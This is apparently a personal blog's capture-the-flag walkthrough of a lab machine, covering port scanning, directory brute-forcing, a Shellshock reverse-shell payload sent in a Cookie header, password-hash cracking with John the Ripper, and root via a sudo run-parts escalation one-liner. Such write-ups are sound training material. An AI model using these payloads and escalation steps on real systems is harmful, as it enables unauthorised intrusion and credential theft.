Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Enumeration With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -p- -oA nmap <Target-IP> -vv

# Nmap 7.91 scan initiated Mon Nov 15 09:37:32 2021 as: nmap -sC -sV -p- -oA nmap -vv
Nmap scan report for
Host is up, received syn-ack (0.00023s latency).
Scanned at 2021-11-15 09:37:33 WAT for 8s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 39:41:db:3a:f0:8f:7d:4d:85:c5:aa:0b:5f:66:ba:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDByhYIyiS98RS0gG4B16TAWtpKa+0kovSWt+UIipQR3wA0FJjLh47zpmGoP7HaEP7/0YNIrnrXMCEmQgOvl8T1nafWTaZ47YwkShQRX10leXka2l4naoYK9vFJIUahkM/Gjx8HgLjJu7xLKId1jffPhXSLU60TnBgGW/e7rqcNFB5Mz5cl/mFIraX0/81DZ40Ue+5ttxAT+4u9hbYoYy1MEyoRNQ0N3g6UPK26IHazF0xkLlxHqP7L4iLfnl5GjF18sVGg6vPYcSi/aTTyAKY85PhhBgcrRkOE0tqFXrznT84UX5Kz6EBHdS9Xlar4/q/JQCQYdC3s38XXrs32WwAY4eG1YYvuep6l26KYSaymGRpx3Nk3WltkqQlKM2bHq8jCWI9bL8vEf5UMSbsk/QRTrPf+blfXIokCYz2m+QFmDddPKQ24JYj/wAQ6z7qgl/MNrfC1CKyAbnnRkSE/pto8b7iJgOd7CkB3M28730/bRYHwZbJJNnJG1I/0jxDpj9k=
|   256 66:89:b1:8e:8b:af:cf:7f:49:c5:7c:e6:4b:b7:d8:5b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC4vXcAX0FuhBEcZk2KA5njtMpDJSpWAsddCggiHljbJ3/IjV5dkVX1cnBkMv9uB5dTaV+Qe0qVJPGCermYxHbw=
|   256 a3:b3:f0:14:a4:4e:05:c0:d1:24:2f:a8:fe:a5:2c:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINY9x5z6Jg3VUD13RTFE507JApanRMhT9wbDvDSWQN92
80/tcp open  http    syn-ack Apache httpd 2.4.51 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Mon Nov 15 09:37:42 2021 -- 1 IP address (1 host up) scanned in 9.43 seconds


22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.51 ((Debian))

Interesting we have 2 open ports which is cool and easy i guess let start digging.

Enumeration On Port 80 HTTP

└─$ dirb

DIRB v2.22    
By The Dark Raver

START_TIME: Mon Nov 15 09:44:26 2021
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:403|SIZE:279)                                                                                                                  
+ (CODE:200|SIZE:183)                                                                                                                 
+ (CODE:403|SIZE:279)                                                                                                             
END_TIME: Mon Nov 15 09:44:28 2021

A quick dirb directories bursting but got index.php and cgi-bin default i guess navigating to confirm it on browser.


Checking page source also i go nothing so i decided to burst more directories.

└─$ gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,phtml,html,txt,old,jpg,cgi,sh
Gobuster v3.1.0                                                                    
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET                                                   
[+] Threads:                 10                                                    
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
[+] Negative Status codes:   404                                                   
[+] User Agent:              gobuster/3.1.0    
[+] Extensions:              html,txt,old,jpg,cgi,sh,php,phtml
[+] Timeout:                 10s                                                   
2021/11/15 09:49:43 Starting gobuster in directory enumeration mode


/test.cgi (Status: 200) [Size: 20]


/ (Status: 200) [Size: 137]

Smooth now that is getting interesting we have 2 files with status 200 it possible we are dealing with shellshock or not so i decided to look up some CGI tricks.

└─$ curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' 2>/dev/null| grep 'VULNERABLE'

But dead end got nothing hehehehehe we still have to try let hit it.


curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/ 0>&1'

Ncat listener ready running the payload and boom we got our shell now let spawn a TTY shell.


Now we have a strong and stable shell let enumerate more to move our Privilege to another user.


Nice now let cat it to see what we have.


Some hashes cool let feed it to john the ripper to see if it crackable or a rabbit hole lol.

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 29 password hashes with 29 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Remaining 27 password hashes with 27 different salts
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status


I was able to crack two hashes which is cool i guess now let try it for both users.

Shell As Paulo


Boom i was able to get access with username:- paulo and password:- password123

Privilege Escalation

Time to get root checking sudo -l and seems we can run a command to get root .

User paulo may run the following commands on condor:
    (ALL : ALL) NOPASSWD: /usr/bin/run-parts

Nice so i look up gtfobins.


If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo run-parts --new-session --regex '^sh$' /bin


We are root and done.

Helpful Resources

Greeting From Muzec

Back To Home